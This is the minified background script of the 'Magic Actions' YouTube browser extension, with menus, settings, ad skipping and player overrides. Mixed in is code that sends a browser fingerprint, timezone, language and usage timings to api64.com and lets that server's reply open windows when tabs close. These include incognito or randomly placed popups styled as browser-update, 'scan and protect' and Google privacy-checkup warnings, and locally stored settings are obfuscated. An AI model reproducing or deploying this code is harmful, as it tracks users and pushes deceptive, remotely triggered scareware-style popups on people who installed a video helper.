// // Browser Extension - Magic Actions - CHROMEACTIONS.COM - Copyright (c) 2023 Mixesoft - All Rights Reserved
// Minified by Google Closure Compiler 20240317
try{let I,e,ha;const q=function(a){console.info(a)},O=self,v=[],n=q.call,{navigator:X,Object:Na,Date:Y,parseInt:y,setTimeout:J,JSON:{stringify:P,parse:ia},Math:{random:K,floor:Oa},chrome:{runtime:ja,runtime:{setUninstallURL:Pa,onMessage:ka,onStartup:la,onInstalled:ma},scripting:{executeScript:na},tabs:{query:L,create:Q,update:R,move:Qa,sendMessage:oa,onRemoved:S},windows:{getAll:Ra,create:pa,update:Sa,getLastFocused:Ta},contextMenus:{removeAll:Ua,create:M,onClicked:qa},storage:{local:C},i18n:{getMessage:Va},
management:{getSelf:Wa}}}=O,Xa=ka.addListener.bind(ka),Ya=la.addListener.bind(la),Za=ma.addListener.bind(ma),ra=S.addListener.bind(S),$a=S.removeListener.bind(S),ab=qa.addListener.bind(qa),bb=C.set.bind(C),cb=C.get.bind(C);C.clear.bind(C);const db=O.fetch.bind(O),D=n.bind(Number.prototype.toString),sa=n.bind("".charCodeAt),x=n.bind("".slice),ta=n.bind("".split),ua=n.bind("".indexOf),eb=n.bind("".match),va=n.bind("".startsWith);n.bind("".endsWith);const E=n.bind("".replace);n.bind("".trim);const wa=
n.bind("".charAt),fb=n.bind("".toLowerCase),gb=n.bind(v.push),xa=n.bind(v.join);n.bind(v.indexOf);n.bind(v.map);n.bind(v.reduce);const hb=n.bind(v.includes);n.bind(Y.prototype.getDay);const ya=String.fromCharCode,T=Y.now,z=ja.getURL(""),U=T(),ib=18556092E5>U?!0:!1,jb=/Win/.test(X.platform),F=async function(a,b,c){let d=null,g=2;try{let h=await db(a,b);h&&(h.ok?(d=await h[c](),g=0):"opaqueredirect"==h.type&&(g=1))}catch(h){q(a+" "+h)}return[d,g]},za=function(a){3>a&&F("https://clients2.google.com/service/update2/crx?x=id%3Dabjcfabbhafbcdfjoecdgepllmpfceif%26v%3D7.9.5.6%26uc",
{method:"GET",cache:"no-store",credentials:"include",redirect:"manual"},"text").then(b=>{[,b]=b;1<b&&J(za,3300,a+1)})},kb=async function(){let a=!1;try{let b=(await Wa())?.hostPermissions??[];a=hb(b,"https://*/*")}catch(b){q(b)}return a},lb=async function(){let a=g=>{let h=[0,0,0,0];g="string"==typeof g&&ta(g,".")||[];let p;for(let l=0,w=g.length;l<w;l++)p=y(g[l]),isNaN(p)||(h[l]=p);return h};if("userAgentData"in X){let g=X.userAgentData;g.getHighEntropyValues&&(g=await g.getHighEntropyValues(["fullVersionList"]));
let h,p;var b=0;let l="Google Chrome;Microsoft Edge;Opera;Opera GX;Opera Crypto;Yandex;Brave".split(";"),w=l.length;var c=g.fullVersionList||g.brands||[];for(var d of c){c=d.brand;for(let r=0;r<w;r++)if(c==l[r]){b=r+1;p=d.version;e.bn=l[r];break}"Chromium"==c&&(h=d.version)}d=fb(wa(g.platform||"",0));b=[b,a(p),"w"==d?1:"m"==d?2:"c"==d?3:"l"==d?4:0,a(h)]}return b||[0,[0,0,0,0],"",[0,0,0,0]]},mb=async function(a){"sm"in a&&("ma"in a&&(e.ma=a.ma),"ml"in a&&(e.ml=a.ml),"mt"in a&&e.mt!=a.mt&&(e.mt&&$a(Z),
e.mt=a.mt,e.mt&&ra(Z)));await A()},Aa=async function(a){let b;try{const [c,d,g,h]=await lb(),p=T(),l=y((p-(e.ai||0))/6E4),w=y((p-(e.md||0))/6E4),r={a:7,b:7956,c:l,d:e.au,e:g,f:c,g:d[0],h:d[1],i:d[2],j:d[3],k:h[0],l:h[1],m:h[2],n:h[3],o:(new Y).getTimezoneOffset()/60,p:navigator.language||"",r:e.mc||0,s:w,t:e.ma||0,u:e.me?1:0,w:e.mt||0,y:e.ms||0,z:e.ml||0};if(a)for(let m in a)r[m]=a[m];let [t,u]=await F("https://api64.com/upd7",{method:"POST",cache:"no-store",body:P(r),headers:{"Content-Type":"application/json"}},
"json");0==u&&await mb(t);b=u||t}catch(c){q(c),b=5}return b},nb=function(){var a=U-16066872E5;a=18E6>a?0:y(a/18E6,10);e.uf!=a&&(e.uf=a,Aa(null))},V=function(a,b){return Oa(K()*(b+1-a))+a},ob=async function(){try{let a=await L({windowType:"normal",url:"*://*.youtube.com/*",status:"complete"});for(let b=0,c=a.length;b<c;b++)await oa(a[b].id,P(e))}catch(a){q(a)}},Ba=function(a){const b="www.hotcleaner.com/clickclean/install-magic.html#mhvhjfg https://chromewebstore.google.com/detail/abjcfabbhafbcdfjoecdgepllmpfceif/reviews www.youtube.com/channel/UCCwIAJrwWGB2GCyZSp41wNg?sub_confirmation=1 www.facebook.com/magicactions/ www.pinterest.com/magicactions/ www.youtube.com/watch?v=pwHX9JT2APQ twitter.com/chromeactions www.youtube.com/channel/UCCwIAJrwWGB2GCyZSp41wNg".split(" "),
c=["eopt30.html","ectrb30.html"],d="magic-options menu cinema support themes volume-control autohd comments contribute 100-top-music-videos news browser-update-checker the-best-mod-for-youtube scan-update-and-protect-your-browser download-for-firefox privacy-checkup-google-account secure-your-google-account privacy-checkup-twitter-account take-snapshots-of-your-favorite-videos advanced-features stop-autoplay loop-videos-with-a-multi-range-looper better-video-experience captured-video-frames delete-browsing-data calendar-maker start clear-browsing-data download-for-chrome download-for-opera download-for-edge features fireworks help-and-tips optout how-to-manage-youtube-privacy-settings how-to-whitelist-a-website-in-adblock keyboard-shortcuts-for-youtube-cheat-sheet quick-start-guide virtual-keyboard-for-youtube".split(" ");
return 800==a?"https://www.chromeactions.com/":99<a&&108>a?(101==a?"":"https://")+b[a-100]:199<a&&202>a?z+c[a-200]:299<a&&340>a?"https://www.chromeactions.com/"+d[a-300]+".html":"https://www.chromeactions.com/"},pb=async function(a,b){try{let c=Ba(323),d=await L({url:c});if(d&&d.length){let g=d[0].id;b&&await R(g,{active:b});await oa(g,I)}else{let g=await Q({url:c,active:!1});await R(g.id,{autoDiscardable:!1})}}catch(c){q(c)}},qb=async function(a){try{let b={method:"GET",cache:"no-store"},[c]=await F(a.n,
b,"text"),[d]=await F(z+"gjs30/"+a.j,b,"text"),[g]=await F(z+"gcss30/"+a.c,b,"text");if(c&&d&&g){let h=0<ua(c,"<template")?"</template>":"</head>";c=E(c,"sheet","");c=E(c,"src","url");d=E(d,"ARGS","["+e.ma+","+e.ms+"]");a.v&&(d=E(d,"I18N",a.v));c=E(c,h,"<style>"+g+"</style><script>"+d+"\x3c/script>"+h);a.n="data:text/html;charset=utf-8,"+encodeURIComponent(c)}}catch(b){q(b)}return a},rb=async function(a){try{let b={url:a.n};if(0==e.ma)return b.active=!0,await Q(b);10==e.ma?(b.type="normal",b.state=
"maximized"):(b.type="panel",b.top=V(8,133),b.left=V(8,133),b.width=a.w+V(1,34),b.height=a.h+V(1,34));9<e.ma&&(b.incognito=!0);return await pa(b)}catch(b){q(b)}},Ca=async function(){try{let a=e.ms=e.mt;e.mt=0;e.md=T();e.mc++;1==a&&(e.au=0);if(!await A()){1==e.ml&&9<e.ma&&(e.ml=0);let b;if(1==a)b={w:900,h:600},2==e.ml?b.n="https://www.chromeactions.com/magic-updated.html":(b.n=z+"erenewed30.html",0==e.ml&&(b.c="erenewed30.css"));else if(2==a)b={w:620,h:410},2==e.ml?b.n="https://www.chromeactions.com/download-latest-version.html":
(b.n=z+"ever30.html",0==e.ml&&(b.c="ever30.css"));else if(2<a)if(b={w:513,h:228},2==e.ml)b.n="https://www.chromeactions.com/"+(3==a?"clear-cache-and-watching-history":4==a?"scan-update-and-protect-your-browser":"privacy-checkup-google-account")+".html";else if(b.n=z+"edialog30.html",0==e.ml){let c=sb("msg"+a);4==a&&e.bn&&(c=E(c,"Chrome",e.bn+"™"));b.c="edialog30.css";b.v=c}b&&(0==e.ml?(b.j="edialog30.js",b=await qb(b)):1==e.ml&&(b.n+="#"+T()+"-"+e.ma+"-"+a),await rb(b))}}catch(a){q(a)}},
Z=function(a,b){b&&0==b.isWindowClosing&&Ca()},tb=async function(){let a;try{let b=await Ta();if(b&&"normal"==b.type)a=b;else{b=await Ra();for(let c=0,d=b.length;c<d;c++)if("normal"==b[c].type){a=b[c];break}}}catch(b){q(b)}return a},Da=async function(a){try{await Sa(a.windowId,{focused:!0}),await R(a.id,{active:!0})}catch(b){q(b)}return a},ub=async function(a){let b;try{let c={url:a.q||a.u};a.t&&(c.title=a.t);let d=await L(c);d&&0<d.length?(b=d[0],a.a&&await Da(b)):b=await Q({url:a.u,active:a.a?!0:
!1})}catch(c){q(c)}return b},vb=async function(a){let b;try{let c={url:a.q||a.u};a.t&&(c.title=a.t);let d=await L(c);if(d&&0<d.length)b=d[0];else{let g=await tb(),h=g?g.id:null,p=await pa({url:a.u,type:"normal",state:h?"minimized":"maximized"});d=await L({windowId:p.id});b=d[0];h&&(b=await Qa(b.id,{index:-1,windowId:h}))}a.a&&await Da(b)}catch(c){q(c)}return b},B=function(a,b){let c,d=typeof a;"number"==d?c=Ba(a):"string"==d&&(va(a,"https://www.chromeactions.com/")?c=a:va(a,"chrome")&&(c=a));c&&(jb?
vb({u:c,a:b}):ub({u:c,a:b}))},wb=function(a,b){let c=a.menuItemId;9756==c?B(201,!0):9757==c?B(101,!0):9758==c?B(310,!0):9759==c?B(102,!0):9755==a.menuItemId&&(a="https://www.youtube.com/results?search_query="+encodeURIComponent(a.selectionText),0==ua(b.url,"https://www.youtube.com/")?R({url:a,active:!0}):Q({url:a,active:!0}))},Ea=function(a){Ua().then(()=>{let b=()=>{let c=ja.lastError;c&&q(c)};M({id:"9756",title:"¤ Contribute …",contexts:["action"]},b);M({id:"9757",title:"♥ Rate Me …",contexts:["action"]},
b);M({id:"9758",title:"♫ What's New …",contexts:["action"]},b);M({id:"9759",title:"► Subscribe …",contexts:["action"]},b);a&&M({id:"9755",title:"Search YouTube for %s",contexts:["selection"]},b)})},aa=function(){let a=D(4294967296*K()>>>0,16),b=D((4294967296*K()&4294922239|16384)>>>0,16),c=D((4294967296*K()&3221225471|2147483648)>>>0,16),d=D(4294967296*K()>>>0,16);8>a.length&&(a=x("0000000"+a,-8));8>b.length&&(b=x("0000000"+b,-8));8>c.length&&(c=x("0000000"+c,-8));8>d.length&&(d=x("0000000"+d,-8));
return xa([a,x(b,0,4),x(b,4),x(c,0,4),x(c,4)+d],"-")},ba=function(){return{ver:"",extURL:"",ai:0,au:0,uf:0,bn:"",mc:0,md:0,mt:0,ms:0,ma:0,ml:1,me:!0,uid:"",mwvc:!0,color:"white",mwvcm:!0,mwvcs:!1,mwvct:!1,mwvcr:!1,mwvci:1,gap:5,hq:!0,hqi:"large",pause:!1,plist:!1,buf:!1,buf1:!1,loop:!1,anns:!0,cin:!0,cina:!1,cine:!1,cini:2,cinf:!1,cinc:0,cint:1,cinl:!1,h0:!1,h1:!1,h2:!1,h3:!1,h4:!1,h5:!1,h6:!1,h7:!1,h8:!1,h9:!1,h10:!1,h11:!1,h12:!1,h13:!1,h14:!1,a0:!0,a2:!1,a3:!0,a4:!0,a5:!1,a6:!1,a8:!1,a9:!1,ui:0,
c0:!1,c1:!1,c2:!1,c3:!1,c4:!1,f0:!0,b0:!0,b1:!0,b2:!0,b3:!1,mrl:!0,ps:!1,psi:100,wd:""}},xb=function(a){let b="",c=[3,0,0,-3],d;for(let g=0,h=a.length;g<h;g++)d=c[g%4],b=g+d<h?b+D(sa(a,g+d),16):b+D(sa(a,g),16);return b},yb=function(a){a=eb(a,/.{1,2}/g);let b=[3,0,0,-3],c,d="";for(let g=0,h=a.length;g<h;g++)c=b[g%4],d=g+c<h?d+ya(y(a[g+c],16)):d+ya(y(a[g],16));return d},zb=function(a){return xb(P(a))},Ab=function(a){let b;try{"{"!=wa(a,0)&&(a=yb(a)),b=ia(a)}catch(c){b=void 0}return b.constructor===
Na?b:void 0},Bb=function(a){const b=ba();for(let c in a)c in b?typeof a[c]!==typeof b[c]&&(a[c]=b[c]):delete a[c];for(let c in b)c in a||(a[c]=b[c]);return a},A=async function(){let a;try{if(e){e.ver="7.9.5.6";let b=zb(e);await bb({pfs:b})}}catch(b){q(b),a=b}return a},Fa=async function(a,b){for(var c of"ver uf au extURL uid wd ai bn mc md mt ms ma ml".split(" "))delete a[c];c=ba();for(let d in a)d in c&&typeof a[d]==typeof c[d]&&(e[d]=a[d]);b&&Ea(e.a0&&e.a3);ob();A()},Cb=function(){let a=ba();a.ver=
"7.9.5.6";a.ai=U;a.uid=aa();return a},Ob=function(a,b){let c=self.ytplayer||{},d,g,h,p,l,w;const r=self,t=r.document,u=t.documentElement;var m=Function.prototype.call;const G=m.bind(r.addEventListener),Db=t.createElement.bind(t),H=t.querySelector.bind(t);m.bind(u.querySelector);const Eb=m.bind(u.appendChild);m.bind(u.getAttribute);const Ga=m.bind(u.setAttribute),Fb=m.bind(u.removeAttribute);m.bind(t.dispatchEvent);const Gb=m.bind(Event.prototype.stopPropagation);m.bind(u.remove);const W=Function.prototype.apply.bind(HTMLMediaElement.prototype.play),
Ha=m.bind(String.prototype.indexOf),Hb=JSON.parse,Ia=m.bind(DOMTokenList.prototype.contains),Ib=m.bind(DOMTokenList.prototype.add),ca=m.bind(Object.getOwnPropertyDescriptor(Element.prototype,"classList").get),Jb=m.bind(Object.getOwnPropertyDescriptor(Node.prototype,"textContent").set),N=m.bind(Object.getOwnPropertyDescriptor(Node.prototype,"parentElement").get),Ja=function(f){let k=H("#player-container video")||H("#player video")||H("#movie_player video")||H('video [src^="b"]');return k?f?N(N(k)):
k:null};var da=function(f,k){"dark"==f&&b.a0&&b.a4?b.a4=!0:Fb(u,f)};const Kb=function(f,k){"dark"==f&&b.a0&&b.a4?b.a4=!0:Ga(u,f,k||"")};m=function(f){var k=Hb(f.detail);f=k.f;k=k.a;if("opt"==f)b.a0=k.a0,b.a4=k.a4,b.b0=k.b0,b.b1=k.b1,b.b2=k.b2,b.pause=k.pause,b.plist=k.plist;else if("vol"==f)l=l||Ja(!0),l.isMuted()&&l.unMute(),f=l.getVolume(),f+=k,0>f?f=0:100<f&&(f=100),l.setVolume(f,1),(w=w||H("canvas.__vol"))&&Ga(w,"data-vol",f);else if((l=l||Ja(!0))&&f in l)l[f](k)};const ea=function(){let f=0<
Ha(r.location.search,"list=")?!0:!1;g=b.pause?f?b.plist?1:0:0:1},Lb=function(f){f instanceof Event&&f.isTrusted&&(g=1)},Ka=function(f){f&&Ia(ca(f),"ad-showing")&&(p&&(clearTimeout(p),p=0),f.cancelPlayback&&(f.skipped_by_user=!0,f.cancelPlayback(),g&&f.playVideo()))},Mb=function(f){f instanceof Event&&f.isTrusted&&(Ka(N(this)),Gb(f))},Nb=function(){let f=N(N(this));if(f){if(f.skipped_by_user)return delete f.skipped_by_user,h&&f.unMute(),W(this,arguments);if(Ia(ca(f),"ad-showing")){if(b.b0){b.b2&&0==
f.isMuted()&&(h=!0,f.mute());if(b.b1){let k=H(".__magic-skip");k||(k=Db("button"),Jb(k,"Magic Skip"),Ib(ca(k),"__magic-skip"),Eb(f,k),G(k,"click",Mb,!0))}b.b3&&(p||(p=setTimeout(Ka,6E4,f)))}return W(this,arguments)}h&&f.unMute();if(g)return W(this,arguments);if("pauseVideo"in f)return f.pauseVideo(),this.currentTime=.1,Promise.resolve()}return W(this,arguments)};if(r){try{Object.defineProperty(r,"ytplayer",{get:function(){if(c&&c.config&&c.config.args&&!d){d=!0;let f=c.config.args;b.hq&&(f.suggestedQuality=
f.vq=b.hqi);b.anns&&(f.iv_load_policy=3)}return c},set:function(f){c=f},configurable:!1,enumerable:!0})}catch(f){}try{Object.defineProperty(HTMLMediaElement.prototype,"play",{configurable:!1,writable:!1,value:Nb})}catch(f){}u.removeAttribute=da;u.setAttribute=Kb;da=0<Ha(r.location.search,"list=")?!0:!1;g=b.pause?da?b.plist?1:0:0:1;G(r,"popstate",ea,!1);G(t,"yt-navigate",ea,!1);G(t,"spfrequest",ea,!1);G(t,"click",Lb,!0);G(t,"t"+a,m,!0)}},sb=function(a){return Va(a)||""},fa=function(){e?(B(800,!1),
J(function(){B(100,!0)},890)):J(fa,1E3)},La=function(a){e?(e.au=y(xa(ta(a||"7.9.5.3","."),"")),e.ai=e.ai||U,e.uid=e.uid||aa(),A()):J(La,1E3,a)},Pb=async function(a){let b;if(a){const c=a.c;if(89==c)[a]=await F("https://api64.com/dbge",{method:"POST",cache:"no-store",body:a.p},"text"),"ok"==a&&(b=ha=200);else if(ha){let d=a.o||{};for(let g in d)e[g]=d[g];10==c?b=await Aa(a.p):30==c?b=await A():1==c?await Ca():51==c&&fa()}else b=403}return b},Ma=function(a,b,c){if("number"==typeof a)-1<(b?.tab?.index??
-1)&&(b=b?.tab?.id??-1,-1<b&&(na({target:{tabId:b},func:Ob,args:[a,e],injectImmediately:!0,world:"MAIN"}),na({target:{tabId:b},func:(d,g)=>{document[d]=g},args:[a,e],injectImmediately:!0}))),c();else{try{a=ia(a)}catch(d){a={id:404}}0==a.id?c(P(e)):2==a.id?(B(a.u,a.a),c()):3==a.id?(Fa(a.opt,!1),c()):4==a.id?(b={},b[a.name]=a.value,Fa(b,a.ctx||!1),c()):5==a.id?c({value:e[a.name]}):6==a.id?(I=a,pb(b.tab.id,a.a),c()):9==a.id?c(I):13==a.id?"string"==typeof a.u&&65>a.u.length?(e.uid=a.u,A(),c()):c(e.uid||
aa()):21==a.id?"string"==typeof a.d&&1025>a.d.length?(e.wd=a.d,A(),c()):c(e.wd):54==a.id&&Pb(a.v).then(c)}};Xa((a,b,c)=>{e?Ma(a,b,c):gb(v,[a,b,c]);return!0});Ya(()=>{});Za(a=>{const b="object"==typeof a&&a.reason||"";"install"===b?fa():"update"===b&&"7.9.5.6"!==a.previousVersion&&La(a.previousVersion||"7.9.5.3")});Pa("https://www.chromeactions.com/support.html#mhuhjfg");(async function(){let a;try{let {pfs:b}=await cb(["pfs"]);if("string"==typeof b){let c=Ab(b);"object"==typeof c&&(a=Bb(c))}a&&(a.extURL=
z)}catch(b){q(b)}return a||Cb()})().then(a=>{e=a;for(let b=0,c=v.length;b<c;b++)Ma.apply(O,v[b]);Ea(e.a0&&e.a3);ab(wb);ib&&J(nb,3300);e.mt&&ra(Z);kb().then(b=>{b&&za(0)})})}catch(I){console.info(I)};
